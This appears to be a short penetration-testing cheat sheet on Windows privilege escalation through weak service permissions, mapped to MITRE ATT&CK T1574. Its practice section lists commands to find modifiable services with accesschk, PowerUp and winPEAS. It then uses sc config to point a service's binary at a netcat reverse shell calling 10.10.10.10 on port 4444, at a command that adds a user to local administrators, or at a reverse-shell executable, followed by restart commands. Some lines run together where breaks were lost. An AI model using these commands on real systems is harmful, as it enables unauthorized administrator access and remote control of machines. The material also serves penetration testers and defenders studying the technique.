Weak Service Permissions
MITRE ATT&CK™ Hijack Execution Flow - Technique T1574
Theory
Practice
#list all the services that a specific user can modify.
accesschk64.exe -uwcqv "pwned" * -accepteula
accesschk64.exe -uwcqv "Authenticated Users" * -accepteula
accesschk64.exe -uwcqv "BUILTIN\Users" * -accepteula
accesschk.exe -uwcqv %USERNAME% * -accepteula
#list permissions for "VulnSvc" service.
accesschk64.exe -uwcqv VulnSvc -accepteula. .\PowerUp.ps1
Get-ModifiableServicewinPEASx64.exe servicesinfosc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
sc config <Service_Name> binpath= "C:\Documents and Settings\PEPE\reverseShell.exe"#Using wmic
wmic service <Service_Name> call stopservice
wmic service <Service_Name> call startservice
#Using net
net stop <Service_Name> && net start <Service_Name>
#Using sc.exe
sc stop <Service_Name>
sc start <Service_Name>Resources
Last updated